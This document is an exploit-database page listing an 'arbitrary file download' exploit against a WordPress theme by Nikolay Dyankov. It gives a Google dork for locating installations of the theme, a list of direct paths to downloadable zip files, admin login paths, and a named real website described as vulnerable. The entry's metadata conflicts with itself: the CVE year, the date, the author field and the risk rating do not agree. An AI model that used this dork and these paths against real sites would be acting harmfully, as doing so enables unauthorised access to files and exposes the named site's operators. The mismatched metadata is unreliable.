Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2020-27577 | CWE-264 | $5,000 | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Nikolay Dyankov | High | Remote | 2018-12-11 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:7.5/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N | 0.02192 | 0.50148 |
################################################################################################# # Exploit Title : WordPress NikolayDyankovDesign Themes 2.0 Arbitrary File Download Disclosure # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 08/12/2018 # Vendor Homepage : pinterest.com/nikolaydyankov/ ~ nikolaydyankovdesign.com ~ semsoft.ca # Software Download Link : N/A # Tested On : Windows and Linux # Category : WebApps # Version Information : 1.0 and 2.0 # Exploit Risk : Medium # Google Dorks : inurl:''/wp-content/themes/nikolaydyankovdesign/'' # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ] CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ] ################################################################################################# # Admin Panel Login Path : /demox/admin/ /wp-login.php # Exploit : /wp-content/themes/nikolaydyankovdesign/documentations/dynamic-grid-the-engine.zip /wp-content/themes/nikolaydyankovdesign/documentations/flipper-for-wordpress-2-0.zip /wp-content/themes/nikolaydyankovdesign/documentations/flipper.zip /wp-content/themes/nikolaydyankovdesign/documentations/rockstar-map-for-wordpress.zip /wp-content/themes/nikolaydyankovdesign/documentations/rockstar-map.zip /wp-content/themes/nikolaydyankovdesign/documentations/timeliner-for-wordpress.zip /wp-content/themes/nikolaydyankovdesign/documentations/timelinexml.zip /wp-content/themes/nikolaydyankovdesign/documentations/touch-timeline-for-wordpress.zip /wp-content/themes/nikolaydyankovdesign/documentations/touch-timeline.zip ################################################################################################# # Example Vulnerable Site => [+] photobook.com.tr/demox/siparis/wp-content/themes/nikolaydyankovdesign/documentations/dynamic-grid-the-engine.zip ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.